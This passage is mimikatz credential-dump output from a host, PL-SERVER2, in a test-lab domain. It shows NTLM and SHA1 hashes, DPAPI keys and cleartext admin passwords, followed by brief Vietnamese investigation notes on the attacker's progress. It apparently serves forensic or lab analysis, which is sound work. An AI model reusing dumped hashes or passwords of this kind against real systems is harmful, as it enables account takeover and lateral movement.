Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 652201751 (00000000:26dfcf17)
Session : RemoteInteractive from 3
User Name : administrator
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/22/2024 1:43:22 PM
SID : S-1-5-21-2645767256-3101023073-3015972391-500
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 43023 (00000000:0000a80f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/7/2024 5:58:33 PM
SID :
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 596480889 (00000000:238d9379)
Session : RemoteInteractive from 2
User Name : domain.admin
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/21/2024 11:15:55 AM
SID : S-1-5-21-2645767256-3101023073-3015972391-1105
msv :
[00000003] Primary
* Username : domain.admin
* Domain : TESTLAB
* NTLM : 618dbaf0bff2cd7e3e5458e9b754606f
* SHA1 : 0ca85d84678938da25703f216670f63ed62def5b
* DPAPI : 693e65efdba099fb726da3ba4db4e411
tspkg :
wdigest :
* Username : domain.admin
* Domain : TESTLAB
* Password : T3stT3@m@123
kerberos :
* Username : domain.admin
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
[00000000]
* Username : PL-SERVER2\Administrator
* Domain : PL-SERVER2\Administrator
* Password : 123qweA@
[00000001]
* Username : domain.admin
* Domain : domain.admin
* Password : T3stT3@m#123
[00000002]
* Username : Administrator
* Domain : Administrator
* Password : 123qweA@
Authentication Id : 0 ; 596480654 (00000000:238d928e)
Session : RemoteInteractive from 2
User Name : domain.admin
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/21/2024 11:15:55 AM
SID : S-1-5-21-2645767256-3101023073-3015972391-1105
msv :
[00000003] Primary
* Username : domain.admin
* Domain : TESTLAB
* NTLM : 618dbaf0bff2cd7e3e5458e9b754606f
* SHA1 : 0ca85d84678938da25703f216670f63ed62def5b
* DPAPI : 693e65efdba099fb726da3ba4db4e411
tspkg :
wdigest :
* Username : domain.admin
* Domain : TESTLAB
* Password : T3stT3@m@123
kerberos :
* Username : domain.admin
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
[00000000]
* Username : PL-SERVER2\Administrator
* Domain : PL-SERVER2\Administrator
* Password : 123qweA@
[00000001]
* Username : domain.admin
* Domain : domain.admin
* Password : T3stT3@m#123
[00000002]
* Username : Administrator
* Domain : Administrator
* Password : 123qweA@
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 64114 (00000000:0000fa72)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 1037447963 (00000000:3dd6331b)
Session : Batch from 0
User Name : Administrator
Domain : PL-SERVER2
Logon Server : PL-SERVER2
Logon Time : 8/28/2024 2:52:59 PM
SID : S-1-5-21-2483637071-3450637983-2970284052-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : PL-SERVER2
* NTLM : d9d39508c90a3b55e95319c6fa45f524
* SHA1 : cc64c97d94919579f6091a6d401f5109d9a15c65
tspkg :
wdigest :
* Username : Administrator
* Domain : PL-SERVER2
* Password : 123qweA@
kerberos :
* Username : Administrator
* Domain : PL-SERVER2
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 596451255 (00000000:238d1fb7)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/21/2024 11:15:47 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 1ab4b40ad1596522a1490bb2b77ab9bd
* SHA1 : 02743131a078108d2a11e396b48b63ebbe3fba7d
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
ssp :
credman :
Authentication Id : 0 ; 596038116 (00000000:2386d1e4)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 8/21/2024 11:04:24 AM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : PL-SERVER2$
Domain : TESTLAB
Logon Server : (null)
Logon Time : 8/7/2024 5:58:32 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : pl-server2$
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 64145 (00000000:0000fa91)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 1ab4b40ad1596522a1490bb2b77ab9bd
* SHA1 : 02743131a078108d2a11e396b48b63ebbe3fba7d
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : PL-SERVER2$
Domain : TESTLAB
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : pl-server2$
* Domain : TESTLAB.LOCAL
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 1042707405 (00000000:3e2673cd)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
mimikatz #Có thể thấy cả user và pass của domain.admin đều đã bị dump ra.
Dựa trên câu lệnh psexec và alert trên AD, có thể đoán hacker chưa thể lateral movement được sang AD.
Bonus, hacker đã có thử dùng nc thay vì main.exe
Tính tới thời điểm này, hacker chưa làm được gì khác.
